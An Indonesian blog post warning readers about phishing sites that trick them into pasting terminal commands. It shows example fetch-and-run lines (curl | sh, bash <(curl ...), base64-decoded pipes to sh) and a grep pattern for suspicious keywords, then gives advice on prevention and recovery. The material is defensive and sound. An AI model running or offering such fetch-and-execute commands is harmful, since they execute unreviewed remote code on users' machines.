Kembali ke Blog
Security

Cara Menipu Paling Jujur di Internet: Situs yang Menyuruhmu Tempel Perintah Terminal

Modus phishing yang memakai orang awam sebagai alatnya sendiri: situs menyuruhmu meng-copy lalu mengeksekusi perintah terminal. Begini cara mengenalinya, mencegahnya, dan apa yang dilakukan kalau sudah terlanjur.

A
Alif Afriza Penulis
· · 5 menit baca
Cara Menipu Paling Jujur di Internet: Situs yang Menyuruhmu Tempel Perintah Terminal

Phishing Paling Licik Justru Minta Korban Menjalankan Sendiri

Kamu tidak perlu lagi mengeklik lampiran mencurigakan untuk kena phising. Cara terbaru yang cukup sering beredar tidak menipu secara diam-diam. Situsnya terus terang memintamu: salin perintah ini, tempel di terminal, lalu jalankan.

Yang membingungkan, instruksi itu datang dari halaman yang kelihatannya biasa. Halaman tutorial, halaman bantuan instalasi, forum, atau blog palsu yang meniru tampilan layanan populer. Banyak orang menganggapnya bagian dari panduan. Padahal begitu perintah masuk ke terminal, bukan peringatan yang muncul, tapi sesuatu yang benar-benar berjalan di mesinmu.

Aku tulis ini karena modusnya sederhana tapi bekerja dengan menunggangi satu kebiasaan manusia: orang awam tidak bisa membedakan “mengunduh file” dengan “menjalankan kode orang asing”. Keduanya terlihat sama di layar, yaitu satu baris teks yang ditempel.

Kenapa curl | sh Begitu Berbahaya

Coba lihat contoh yang paling umum beredar:

curl -fsSL https://situs.example.com/install.sh | sh

Secara garis besar, baris ini melakukan dua hal sekaligus:

  1. curl mengunduh file install.sh dari internet.
  2. Tanda | (pipe) meneruskan isinya langsung ke sh, yang mengeksekusi skrip tersebut.

Tidak ada jeda di antara keduanya. Kamu tidak pernah diberi kesempatan membaca isinya. Apa pun yang ditulis pelaku di dalam file itu langsung dijalankan dengan hak akses sepenuhnya di komputermu.

Kasus sedikit lebih rumit biasanya memakai langkah sementara agar sulit ditebak orang awam:

bash <(curl -s https://situs.example.com/script.sh)
echo <teks-acak-panjang> | base64 --decode | sh

Bentuk terakhir ini yang paling jahat. Kode berbahayanya disulap jadi teks acak yang tidak terbaca manusia, lalu didecode dan dijalankan dari cache. Pelaku tahu orang awam tidak akan bersusah payah memahami teks sepanjang itu seperti ini.

Ciri Situs yang Harus Membuatmu Berhenti Sejenak

Tidak semua situs yang menyuruh copy paste itu jahat. Ada tool valid yang memang menyarankan instalasi via perintah. Bedanya, cara itu hanya aman bila kamu bisa membaca dan memahami isi yang dijalankan.

Hati-hati dengan kombinasi ini:

  • Situsnya beredar lewat iklan, pesan singkat, atau komentar, bukan dari sumber yang kamu cari sendiri.
  • Ekor domainnya aneh atau mirip-mirip layanan resmi, misal gogle-update.com.
  • Instruksinya mendesak: “jalankan sebelum kedaluwarsa”, “wajib sekarang”, “tanpa ini akunmu hilang”.
  • Halaman minta izin akses clipboard. Sudah cukup banyak situs jahat yang memanfaatkan API clipboard di browser untuk menyuntikkan sesuatu di balik perintah yang kamu salin.
  • Perintahnya mengandung base64, curl | sh, wget -qO- | bash, atau menekan output dengan -q dan redirect >/dev/null. Semua itu bisa dipakai untuk menyembunyikan apa yang sebenarnya terjadi.

Cara Mencegah: Jangan Pernah Menjalankan yang Tidak Kamu Baca

Aturan yang kutanamkan ke diriku sendiri satu: unduh dulu, baca dulu, eksekusi terpisah.

1. Ganti Pipe dengan Dua Langkah

Jangan langsung menjalankan curl | sh. Pecah menjadi dua langkah:

curl -fsSL https://situs.example.com/install.sh -o install.sh

Sekarang kamu punya file install.sh di folder kamu. Baca isinya sebelum memutuskan apa-apa:

cat install.sh

Atau kalau filenya panjang, lihat bagian yang bergerak:

grep -nE "curl|wget|base64|/tmp|eval|rm|sudo|chmod|ssh|crontab" install.sh

Kalau isinya masuk akal dan bisa kamu ikuti maksudnya, baru kamu jalankan. Kalau tidak paham, jangan dijalankan.

2. Minta Mesin Lain Membacakan untukmu

Bukan semua orang nyaman membaca skrip mentah. Di sinilah tool bantu seperti OpenCode masuk. OpenCode adalah AI coding agent yang berjalan di terminal. Bukan untuk menjalankan skrip itu, tapi untuk membaca dan menjelaskannya baris demi baris.

Jadi alurnya seperti ini: download file-nya dulu seperti langkah satu, lalu serahkan file itu ke OpenCode dan minta dia menjelaskan apa yang dilakukan skripnya, per bagian, dalam bahasa yang kamu mengerti. OpenCode membaca file, tidak mengeksekusinya. Biasanya cukup satu pertanyaan: apa sebenarnya yang baris ini kerjakan saat dijalankan?

Ini bukan memindahkan kepercayaan dari situs asing ke AI. Ini memindahkan kepercayaan dari “orang asing yang mengetik” ke “penjelasan yang bisa kamu ikuti dan putuskan sendiri”. Keputusan tetap di kamu.

3. Pasang Lapisan Tangkapan: Malwarebytes

Kebiasaan membaca itu pencegahan utama, dan antivirus hanyalah jaring pengaman. Untuk Windows, Malwarebytes adalah contoh yang jujur di kelasnya: ia memindai lebih dulu, dan lapisan real time-nya menangkap payload yang sudah dikenali sebelum sempat berjalan penuh.

Tapi aku harus bilang jujur di sini. Antivirus tidak bisa diandalkan sendirian melawan skrip curl | sh. Payload baru yang belum dikenal bisa lolos lewat celah itu persis karena tidak dikenali. Karena itu urutannya tetap: antivirus untuk menangkap yang sudah dikenal, kebiasaan membaca untuk yang belum. Keduanya dipakai, bukan salah satu.

Sudah Terlanjur Menjalankan? Ini Urutan yang Kupakai

Kalau kamu baru sadar setelah perintah itu jalan, jangan panik dulu. Kerjakan langkah ini dengan tenang dan urut:

  1. Cabut dari internet. Putuskan koneksi jaringan atau aktifkan mode pesawat di perangkat. Ini menghentikan skrip yang masih mengambil data dari server atau mengirim sesuatu ke luar.
  2. Cari apa yang baru berjalan. Buka task manager atau daftar proses, dan lihat proses yang tidak kamu kenal. Perhatikan juga hal yang terekam untuk berjalan otomatis: entri startup, perintah di file konfigurasi shell seperti .bashrc, .zshrc, rc.local, atau jadwal lewat cron.
  3. Rotasi kredensial yang mungkin terbaca. Kalau skrip sempat melihat file konfigurasi kamu, tetap anggap yang tertangkap: ganti kata sandi, token, dan kunci API yang ada di mesin itu. Mulai dari yang paling penting: email, penyimpanan cloud, kunci SSH.
  4. Pindai dengan Malwarebytes. Jalankan pemindaian penuh. Skrip yang dikenali akan ketemu di sini.
  5. Pantau akunmu. Setelah online lagi, cek riwayat login dan email yang diceritakan. Skrip jahat kadang menambahkan aturan penerusan pesan atau sesi yang tetap aktif di tempat lain.

Kalau data di mesin itu benar-benar penting, jangan setengah-setengah: backup dokumen yang kamu sendiri buat dengan cara yang tidak ikut terpapar, lalu pertimbangkan instal ulang sistem. Menginstal ulang memang merepotkan, tapi sering jadi satu-satunya cara memastikan tidak ada yang tersisa.

Penutup Singkat

Perintah yang ditempel hanya satu baris, tapi isinya bisa sepanjang kekhilafanmu. Sebelum kamu bunuh pelaku, urutannya cuma tiga: unduh, baca, putuskan. Siapapun yang minta kamu melewatkan langkah baca itu sedang punya alasan. Dan alasan itu hampir tidak pernah baik untukmu.

Open for Contributors

Ide kamu layak dibaca ribuan orang.

ByteNesia dibangun untuk semua orang. Kalau kamu punya pengalaman, tutorial, atau opini tentang teknologi, tulis dan bagikan lewat sini. Nama kamu akan tercantum sebagai kontributor.

Tulis apa saja: review tools, tutorial homelab, tips security, atau cerita pengalaman tech kamu.

Diskusi & Komentar